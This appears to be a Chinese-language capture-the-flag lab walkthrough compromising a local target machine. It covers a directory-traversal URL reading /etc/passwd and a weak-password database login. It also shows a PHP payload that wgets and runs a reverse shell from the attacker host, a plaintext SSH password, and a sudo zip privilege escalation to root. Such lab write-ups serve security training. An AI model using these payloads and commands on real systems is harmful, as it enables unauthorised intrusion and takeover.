主機:192.168.32.152
靶機:192.168.32.163
目錄遍歷攻擊又稱(目錄爬升,目錄回溯,點-點斜線),指再訪問存儲在web根文件之夾外的文件和目錄,通過操控帶有"點-斜線(..):序列及變化的文件或使用絕對文件夾路徑來引用文件的變量,可以訪問存儲在文件系統上的任意文件和目錄,包括應用程序源代碼,配置文件信息和關鍵系統文件。
系統訪問控制(如在微軟windows系統上鎖定或使用文件)限制了對文件的訪問權限。
nmap,dirb掃描
開放了ssh,http服務還有111端口
dbadmin 測下下弱口令admin。直接可以登錄
用掃描器掃,發現存在目錄遍歷高位漏洞
訪問下看看:可以看到etc/passwd目錄下的用戶
http://192.168.32.163/view.php?page=%20../../../../../../../../../../etc/passwd
那么我們就可以上傳一個shell到數據庫,再監聽
先將/usr/share/webshells/php 下的 reverse_webshell 復制到桌面上,設置ip和監聽端口,修改名為shell.php
打開數據庫管理頁面,發現如果建一個.php名字的數據庫,利用遍歷目錄漏洞時就可以執行php文件,達到反彈shell的目的
建好庫后添加數據表,字段(寫入
<?php system("cd /tmp; wget http://192.168.32.152:8000/shell.php;chmod +x shell.php;
php shell.php");?>
成功反彈shell!
pty優化終端,
然后在home目錄下發現有一個用戶zico, config文件中發現了對應的數據庫的密碼
那就試試ssh登錄 ssh zico@192.168.32.162
密碼:sWfCsfJSPV9H3AmQzw8
登錄成功后sudo -l 發現 可以使用zip繼續提權
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"
提權成功!
最終得到root權限